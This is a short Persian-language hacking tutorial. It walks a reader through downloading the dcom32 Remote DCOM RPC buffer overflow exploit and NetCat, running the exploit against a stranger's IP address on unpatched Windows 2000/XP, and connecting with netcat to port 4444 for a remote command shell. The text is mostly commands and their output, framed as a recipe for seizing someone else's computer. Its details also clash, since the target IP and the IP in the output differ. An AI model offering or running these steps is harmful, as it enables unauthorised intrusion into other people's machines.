Terror Hellish

---

شما ابتدا دو قابل زیر را دانلود کنید و در درایو C خود کپی کنید

Dcom32

NetCat

حالا به Run رفته cmd رو تایپ کنید و بعد اینتر حالا به این صورت زیر عمل کنید >>>

C:\>dcom32
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin Lauziكre <blauziere [at] altern.org>
- Usage: dcom32 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)

همونطور که میبینید این اکسپولیت تا سرویس پک 1 قابل اجراست .
حالا ما آی پی طرف مقابل رو داریم میخوایم با استفاده از این اکسپولیت از کامپیوترش شل بگیریم.
به صورت زیر عمل کنید>>>

C:\>dcom32 6 81.12.13.27
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin Lauziكre <blauziere [at] altern.org>
- Using return address of 0x77e626ba
Use Netcat to connect to 81.12.27.119:4444

اینی که با خط نارنجی مشخص کردم اینو میگه که پورت 4444 رو این آی پی باز شده و شما میتونید به وسیله نتکت از اون کامپیوتر شل بگیریم

برای شل به وسیله نتکت به این صورت عمل کنید >>>

C:\>nc\nc -vvv 81.12.27.119 4444


و اگر به کامپیوتر طرف وصل بشید خط فرمان زیر را برای شما باز میکنه :

C:\WINDOWS\system32>